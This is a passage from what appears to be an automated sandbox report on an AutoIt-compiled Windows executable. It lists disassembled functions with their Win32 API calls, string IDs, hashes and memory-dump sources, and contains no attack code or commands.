                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                  • Opcode ID: 6707559f36799e1b93fa6eb2a66ff46019b306928ee7024ae016cafea5e9d719
                                                                                                                                                                                                                                                                  • Instruction ID: 6e184ba88a9e5e83e6e1e0355f6ecdc4832b63c1da5e24081054ffc338cc9cfa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6707559f36799e1b93fa6eb2a66ff46019b306928ee7024ae016cafea5e9d719
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48318B71100604AADB259F68CC80AFB73A9FF48760F048619FAA9D7190EB71AC81DB70
                                                                                                                                                                                                                                                                  Function 00D74FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00D750BD
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D750D2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID: '
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                  • Opcode ID: 01d53254225b0e214583e87d85d8cc6d8d57bc30257b94055f4d1ccd783385bf
                                                                                                                                                                                                                                                                  • Instruction ID: 33fd1d22e7a30b296bb41cd4642f7e925df390221d983ccfb85159766d40bf18
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01d53254225b0e214583e87d85d8cc6d8d57bc30257b94055f4d1ccd783385bf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF313974A0070A9FDB14CF69D880BDE7BB5FF49300F148069E908AB355E7B1A945CFA0
                                                                                                                                                                                                                                                                  Function 00D741AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00CE78B1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: GetStockObject.GDI32(00000011), ref: 00CE78C5
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CE78CF
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D74216
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00D74230
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                  • Opcode ID: 7ba851212d4d0d0f8318e83d471ec6a638dd6877e1f7ca55429489a2c38e9658
                                                                                                                                                                                                                                                                  • Instruction ID: ee1e8ccbaeea96ee83570a72426d4e44267ce4e11169db0e2f0ecc207a09e983
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ba851212d4d0d0f8318e83d471ec6a638dd6877e1f7ca55429489a2c38e9658
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09112672610209AFDB01DFA8CC45AFA7BB8EF08314F058914F959E3251E735E8619B60
                                                                                                                                                                                                                                                                  Function 00D5D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D5D7C2
                                                                                                                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D5D7EB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                  • String ID: <local>
                                                                                                                                                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                  • Opcode ID: 235248c5bdb15f6237b815a42f84201b7fe684bd2420199f10634a528ad912b4
                                                                                                                                                                                                                                                                  • Instruction ID: 2e99678bd234dd963a61ab0438a08a200b75ae12bbcaf3937f7736769bdf9acb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 235248c5bdb15f6237b815a42f84201b7fe684bd2420199f10634a528ad912b4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5711297120223279DB384F628C45EF7BE5EEF167A6F104216FD4AC3180D2608848C6F0
                                                                                                                                                                                                                                                                  Function 00D475ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?), ref: 00D4761D
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D47629
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                  • String ID: STOP
                                                                                                                                                                                                                                                                  • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                  • Opcode ID: 1bb3bdd8fa44a1fa07c5674afb5b08710577b1aded89d4e7a7e55098b639f63f
                                                                                                                                                                                                                                                                  • Instruction ID: 8b04c499bace9fdeb365292a1068f6c583297663d9f2e1d54cfcd4eae2123294
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bb3bdd8fa44a1fa07c5674afb5b08710577b1aded89d4e7a7e55098b639f63f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501C032A04A2A8BCB60AFBDDC809BF73B6BF6075075A0924E425D2295EB31DD149660
                                                                                                                                                                                                                                                                  Function 00D4262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D42699
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: 9b58eb1d001d2bdc0fb7500ef4a1fb6ef95a17327bb2515ee7799cba8c1b3bda
                                                                                                                                                                                                                                                                  • Instruction ID: 492fe2591fe088b4812eeb7c77dec03a18598af824a31759b7857851c30fdb89
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b58eb1d001d2bdc0fb7500ef4a1fb6ef95a17327bb2515ee7799cba8c1b3bda
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D01D475601214ABCB04EBA4CC51DFF7779EF46350B440A19F872973D1DA71990CD670
                                                                                                                                                                                                                                                                  Function 00D42525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D42593
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: 7096241ab91071337d6bd1e66fece0b57f2584475ee5c0d7064c3946ebf94ef3
                                                                                                                                                                                                                                                                  • Instruction ID: b536de1b603984c060a68dd159d48b76b174a751cf8d9bfc76a96734c14541e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7096241ab91071337d6bd1e66fece0b57f2584475ee5c0d7064c3946ebf94ef3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7001A275A40104ABCF05EBA0C962EFF77A9DF46340F940029B842A32C1DA50DE0C96B1
                                                                                                                                                                                                                                                                  Function 00D425A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D42615
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: 0a6768e8e2e1fb0bdef75a2831e45d5333cf4bbceb24583289e24d7c0e7b8da4
                                                                                                                                                                                                                                                                  • Instruction ID: 01163d48fe2dd047c4618c62b034aa4deb5f5178216ee6e2e020930f97451584
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a6768e8e2e1fb0bdef75a2831e45d5333cf4bbceb24583289e24d7c0e7b8da4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA01D175A40104ABCB05FBA4C902EFF77B8DF06340F981026B802A3281DB61CE0CE6B2
                                                                                                                                                                                                                                                                  Function 00D426B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00D42720
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: 8254137acbe2a1833eb464f33033a77bc2468815f4325c598bd20fc834d0e6bb
                                                                                                                                                                                                                                                                  • Instruction ID: f843a1aeb85ca8250730ff04ecd74e0c577072c59b3adfc9be5b82f4cb81f6e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8254137acbe2a1833eb464f33033a77bc2468815f4325c598bd20fc834d0e6bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFF0AF75A40214ABCB05A7A48C52FFF7778EF06750F840919F462A32C2DB61990C9270
                                                                                                                                                                                                                                                                  Function 00D41461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D4146F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                  • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                  • Opcode ID: b698ab46b31c58a0583b142796fa623135d6c036984f0cfa63200b00013aacd8
                                                                                                                                                                                                                                                                  • Instruction ID: f8bbe552f8f5e4821e85b6b362ab7d6657f43f07bf40b03b08c606a03c37b28d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b698ab46b31c58a0583b142796fa623135d6c036984f0cfa63200b00013aacd8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4E0D8322447183BD2102794BC03F897A95CF05B51F15481AF74CA85C25EE2249046BA
                                                                                                                                                                                                                                                                  Function 00D010B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D010E2,?,?,?,00CE100A), ref: 00CFFAD9
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00CE100A), ref: 00D010E6
                                                                                                                                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00CE100A), ref: 00D010F5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D010F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                  • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                  • Opcode ID: ac3f82f17de72e341ac9e31da9e9693158286bccacdf79983afd444af9609ebc
                                                                                                                                                                                                                                                                  • Instruction ID: 5dc7d5b82983446f185c0a0a983217a66c07d389dc23bee87e23bc51948d71e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac3f82f17de72e341ac9e31da9e9693158286bccacdf79983afd444af9609ebc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75E06D746003518BD361AF25D804306BBF5EF00700F048D1CE889C2791EBB4D488CBB2
                                                                                                                                                                                                                                                                  Function 00D539D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00D539F0
                                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00D53A05
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                  • String ID: aut
                                                                                                                                                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                  • Opcode ID: 02a8799c8b54cb816b19c9dbbfea23efa54bb8e553ab3756f3c16d244a3394b8
                                                                                                                                                                                                                                                                  • Instruction ID: e869b4451e3fe52ebc39948c4c66698b6d36d61eb74a405dc2994e5cb1162a81
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02a8799c8b54cb816b19c9dbbfea23efa54bb8e553ab3756f3c16d244a3394b8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D05B7150031477DA2097549C0DFCB7A7CDF45710F0005917A59D1191EAB0D985C7A4
                                                                                                                                                                                                                                                                  Function 00D72DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D72E08
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000), ref: 00D72E0F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4F292: Sleep.KERNEL32 ref: 00D4F30A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
